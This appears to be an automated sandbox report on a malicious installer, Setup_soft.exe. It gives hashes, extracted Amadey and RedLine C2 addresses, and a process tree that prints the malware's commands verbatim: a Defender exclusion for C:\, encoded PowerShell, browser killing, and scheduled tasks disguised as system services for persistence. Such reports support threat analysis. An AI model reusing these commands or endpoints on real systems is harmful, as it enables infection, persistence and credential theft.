Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2023 18:21

General

  • Target

    Setup_soft.exe

  • Size

    734.1MB

  • MD5

    9d31e17b11395dc9b2e23b735e3fdb66

  • SHA1

    163fa32c8564013c91caad6801c77b54df758f04

  • SHA256

    94f41bb3d9a7a8b5e0fd58ad4e334d2c923a45cfb42a633b505bd94be8b2c127

  • SHA512

    72fbe9173abb065f20409ce23ce3d3cc6af94468bfae9267926e6acb4203dc5d6fb7bac347c4c5d4ddb91aeff079bb3d87bbb3b2a355310723d6c76e4188b6dd

  • SSDEEP

    98304:Y5I5x3omArylYOI5CAaT+dPas2Yv0zcBWc1fldTRwaykXf1DO4:15xqyoaT+dPB2mwq7T5bXf7

Malware Config

Extracted

Family

amadey

Version

3.65

C2

83.217.11.7/8vcWxwwx3/index.php

Extracted

Family

redline

C2

95.217.146.176:4281

Attributes
  • auth_value

    a909e2aaecf96137978fea4f86400b9b

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • DcRat 17 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detects Smokeloader packer 3 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 9 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 57 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup_soft.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup_soft.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1544
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe"
      2⤵
      • DcRat
      • Blocklisted process makes network request
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4220
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
        3⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:3236
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p
    1⤵
    • Drops file in System32 directory
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:4948
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ED8C.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1480
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:3852
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command Add-MpPreference -ExclusionPath C:\
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1344
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM msedge.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1300
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM chrome.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4564
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Edge" /v DownloadRestrictions /t REG_DWORD /d 3
        2⤵
          PID:4216
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Policies\Google\chrome" /v DownloadRestrictions /t REG_DWORD /d 3
          2⤵
            PID:4232
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM opera.exe
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3752
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM brave.exe
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3364
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM firefox.exe
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3700
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM Telegram.exe
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2356
        • C:\Users\Admin\AppData\Local\Temp\F31B.exe
          C:\Users\Admin\AppData\Local\Temp\F31B.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:5076
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3076
        • C:\Users\Admin\AppData\Local\Temp\F3B8.exe
          C:\Users\Admin\AppData\Local\Temp\F3B8.exe
          1⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4988
          • C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
            "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe"
            2⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2396
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe" /F
              3⤵
              • DcRat
              • Creates scheduled task(s)
              PID:3000
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\8682d6c68d" /P "Admin:N"&&CACLS "..\8682d6c68d" /P "Admin:R" /E&&Exit
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3640
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                4⤵
                  PID:672
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "nbveek.exe" /P "Admin:N"
                  4⤵
                    PID:1672
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "nbveek.exe" /P "Admin:R" /E
                    4⤵
                      PID:4740
                    • C:\Windows\SysWOW64\cacls.exe
                      CACLS "..\8682d6c68d" /P "Admin:R" /E
                      4⤵
                        PID:3136
                      • C:\Windows\SysWOW64\cacls.exe
                        CACLS "..\8682d6c68d" /P "Admin:N"
                        4⤵
                          PID:3600
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          4⤵
                            PID:4368
                        • C:\Users\Admin\AppData\Local\Temp\1000043001\DefendUpdate.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000043001\DefendUpdate.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:1628
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\1000043001\DefendUpdate.exe
                            4⤵
                              PID:4916
                              • C:\Windows\system32\choice.exe
                                choice /C Y /N /D Y /T 0
                                5⤵
                                  PID:2088
                            • C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
                              "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe"
                              3⤵
                                PID:616
                              • C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
                                "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe"
                                3⤵
                                  PID:4336
                                • C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
                                  "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe"
                                  3⤵
                                    PID:4988
                                  • C:\Users\Admin\AppData\Local\Temp\1000045001\MicrosoftFIX_error.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000045001\MicrosoftFIX_error.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4940
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8be7d7b3521979\cred64.dll, Main
                                    3⤵
                                    • Loads dropped DLL
                                    PID:1392
                                    • C:\Windows\system32\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8be7d7b3521979\cred64.dll, Main
                                      4⤵
                                      • Loads dropped DLL
                                      PID:660
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 660 -s 680
                                        5⤵
                                        • Program crash
                                        PID:4684
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8be7d7b3521979\clip64.dll, Main
                                    3⤵
                                    • Loads dropped DLL
                                    PID:4740
                              • C:\Users\Admin\AppData\Local\Temp\FA8F.exe
                                C:\Users\Admin\AppData\Local\Temp\FA8F.exe
                                1⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Suspicious use of WriteProcessMemory
                                PID:2184
                                • C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe
                                  "C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe"
                                  2⤵
                                  • Drops file in Drivers directory
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1580
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "cmd.exe" /C powershell -EncodedCommand "PAAjAFQAQQBHAE8AYwB6AFkAUgBVAFIAVwBGAFkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBJAEIAYgBnAGkARgBSAFoAbgB4AGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAFQAdQBSAHUATwBEAFIAUgBmAE0AYgBIAGwAeABXACMAPgAgAEAAKAAgADwAIwBGAFUAWQBtAFEAaQBEAGcAYwBlAGYAcgBxAG4AIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAFMASwBDAHAAUwBZAEYAUwBUAG4AaABtAE0AdwBIAFMAeQBkACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBiAGIAcgBWAFAAZwBkAGYATgB0AFYAYwB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEUAawBQAFUAdQBrAEIAaQBxAGYAaABKACMAPgA="
                                    3⤵
                                      PID:3636
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -EncodedCommand "PAAjAFQAQQBHAE8AYwB6AFkAUgBVAFIAVwBGAFkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBJAEIAYgBnAGkARgBSAFoAbgB4AGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAFQAdQBSAHUATwBEAFIAUgBmAE0AYgBIAGwAeABXACMAPgAgAEAAKAAgADwAIwBGAFUAWQBtAFEAaQBEAGcAYwBlAGYAcgBxAG4AIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAFMASwBDAHAAUwBZAEYAUwBUAG4AaABtAE0AdwBIAFMAeQBkACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBiAGIAcgBWAFAAZwBkAGYATgB0AFYAYwB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEUAawBQAFUAdQBrAEIAaQBxAGYAaABKACMAPgA="
                                        4⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2436
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                      3⤵
                                        PID:4520
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                          4⤵
                                          • DcRat
                                          • Creates scheduled task(s)
                                          PID:376
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                        3⤵
                                          PID:2464
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                            4⤵
                                            • DcRat
                                            • Creates scheduled task(s)
                                            PID:1032
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                          3⤵
                                            PID:4760
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                              4⤵
                                              • DcRat
                                              • Creates scheduled task(s)
                                              PID:1476
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                            3⤵
                                              PID:4236
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                4⤵
                                                • DcRat
                                                • Creates scheduled task(s)
                                                PID:3116
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                              3⤵
                                                PID:4512
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                  4⤵
                                                  • DcRat
                                                  • Creates scheduled task(s)
                                                  PID:872
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                3⤵
                                                  PID:1720
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                    4⤵
                                                    • DcRat
                                                    • Creates scheduled task(s)
                                                    PID:4624
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                  3⤵
                                                    PID:3384
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                      4⤵
                                                      • DcRat
                                                      • Creates scheduled task(s)
                                                      PID:900
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                    3⤵
                                                      PID:2736
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                        4⤵
                                                        • DcRat
                                                        • Creates scheduled task(s)
                                                        PID:4968
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk267" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                      3⤵
                                                        PID:4420
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk267" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                          4⤵
                                                          • DcRat
                                                          • Creates scheduled task(s)
                                                          PID:3156
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk172" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                        3⤵
                                                          PID:260
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk172" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                            4⤵
                                                            • DcRat
                                                            • Creates scheduled task(s)
                                                            PID:100
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk117" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                          3⤵
                                                            PID:2556
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk117" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                              4⤵
                                                              • DcRat
                                                              • Creates scheduled task(s)
                                                              PID:3224
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk150" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                            3⤵
                                                              PID:3536
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk150" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                4⤵
                                                                • DcRat
                                                                • Creates scheduled task(s)
                                                                PID:4684
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk405" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                              3⤵
                                                                PID:432
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk405" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                  4⤵
                                                                  • DcRat
                                                                  • Creates scheduled task(s)
                                                                  PID:3200
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                3⤵
                                                                  PID:2256
                                                                  • C:\Windows\SysWOW64\powercfg.exe
                                                                    powercfg /x -hibernate-timeout-ac 0
                                                                    4⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4156
                                                                  • C:\Windows\SysWOW64\powercfg.exe
                                                                    powercfg /x -hibernate-timeout-dc 0
                                                                    4⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:212
                                                                  • C:\Windows\SysWOW64\powercfg.exe
                                                                    powercfg /x -standby-timeout-ac 0
                                                                    4⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1908
                                                                  • C:\Windows\SysWOW64\powercfg.exe
                                                                    powercfg /x -standby-timeout-dc 0
                                                                    4⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3728
                                                                  • C:\Windows\SysWOW64\powercfg.exe
                                                                    powercfg /hibernate off
                                                                    4⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3028
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                    4⤵
                                                                    • DcRat
                                                                    • Creates scheduled task(s)
                                                                    PID:4560
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                                                                  3⤵
                                                                    PID:1404
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                                                                      4⤵
                                                                      • DcRat
                                                                      • Creates scheduled task(s)
                                                                      PID:4992
                                                              • C:\Users\Admin\AppData\Local\Temp\FE3A.exe
                                                                C:\Users\Admin\AppData\Local\Temp\FE3A.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:2444
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\FE3A.exe
                                                                  2⤵
                                                                    PID:1824
                                                                    • C:\Windows\system32\choice.exe
                                                                      choice /C Y /N /D Y /T 0
                                                                      3⤵
                                                                        PID:3384
                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                    1⤵
                                                                      PID:1852
                                                                    • C:\Windows\explorer.exe
                                                                      C:\Windows\explorer.exe
                                                                      1⤵
                                                                        PID:932
                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                        1⤵
                                                                          PID:4704
                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                          1⤵
                                                                            PID:1412
                                                                          • C:\Windows\explorer.exe
                                                                            C:\Windows\explorer.exe
                                                                            1⤵
                                                                              PID:968
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                              1⤵
                                                                                PID:3144
                                                                              • C:\Windows\system32\WerFault.exe
                                                                                C:\Windows\system32\WerFault.exe -pss -s 420 -p 660 -ip 660
                                                                                1⤵
                                                                                  PID:1188
                                                                                • C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3156

                                                                                Network

                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                Execution

                                                                                Scheduled Task

                                                                                1
                                                                                T1053

                                                                                Persistence

                                                                                Scheduled Task

                                                                                1
                                                                                T1053

                                                                                Privilege Escalation

                                                                                Scheduled Task

                                                                                1
                                                                                T1053

                                                                                Credential Access

                                                                                Credentials in Files

                                                                                2
                                                                                T1081

                                                                                Discovery

                                                                                Query Registry

                                                                                4
                                                                                T1012

                                                                                System Information Discovery

                                                                                5
                                                                                T1082

                                                                                Peripheral Device Discovery

                                                                                1
                                                                                T1120

                                                                                Collection

                                                                                Data from Local System

                                                                                2
                                                                                T1005

                                                                                Command and Control

                                                                                Web Service

                                                                                1
                                                                                T1102

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  814947989ba650b60f865ed993f70214

                                                                                  SHA1

                                                                                  86be855bd98709bcb9b002de6f44afe14beb83ff

                                                                                  SHA256

                                                                                  f367cdeda228c76b9184d0a11d5697c9f0daf0bbeccf45dba77b1327da7aeed6

                                                                                  SHA512

                                                                                  312f4f57a91f8f29daf9756af729dc8cd1cd789a22c34b67baad1e503a7e77b3492d87ce05eff1922e8745eeedbb2ef263f05d8433d781929b3b5226433c6113

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                  Filesize

                                                                                  53KB

                                                                                  MD5

                                                                                  3337d66209faa998d52d781d0ff2d804

                                                                                  SHA1

                                                                                  6594b85a70f998f79f43cdf1ca56137997534156

                                                                                  SHA256

                                                                                  9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

                                                                                  SHA512

                                                                                  8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                  Filesize

                                                                                  944B

                                                                                  MD5

                                                                                  6d3e9c29fe44e90aae6ed30ccf799ca8

                                                                                  SHA1

                                                                                  c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                                                  SHA256

                                                                                  2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                                                  SHA512

                                                                                  60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                                                • C:\Users\Admin\AppData\Local\Temp\1000043001\DefendUpdate.exe
                                                                                  Filesize

                                                                                  2.4MB

                                                                                  MD5

                                                                                  b9095b36aebb1f46d374f13267900ce0

                                                                                  SHA1

                                                                                  5f824bd9f4e878055aa595d6d1abdda00ba04aa4

                                                                                  SHA256

                                                                                  747783ba8520d5a835da98c2d9cf3f1a85ee3d57693d7d35c43a2c9ac5dc4375

                                                                                  SHA512

                                                                                  b9737d6b393a0e8d97f93d19c2d03e738ede54cfc35bdb479f52e351daccfc3236855d24796b17b643d2209fb4dc0200837bd55a228ddf03098f37ba53bbb785

                                                                                • C:\Users\Admin\AppData\Local\Temp\1000043001\DefendUpdate.exe
                                                                                  Filesize

                                                                                  2.4MB

                                                                                  MD5

                                                                                  b9095b36aebb1f46d374f13267900ce0

                                                                                  SHA1

                                                                                  5f824bd9f4e878055aa595d6d1abdda00ba04aa4

                                                                                  SHA256

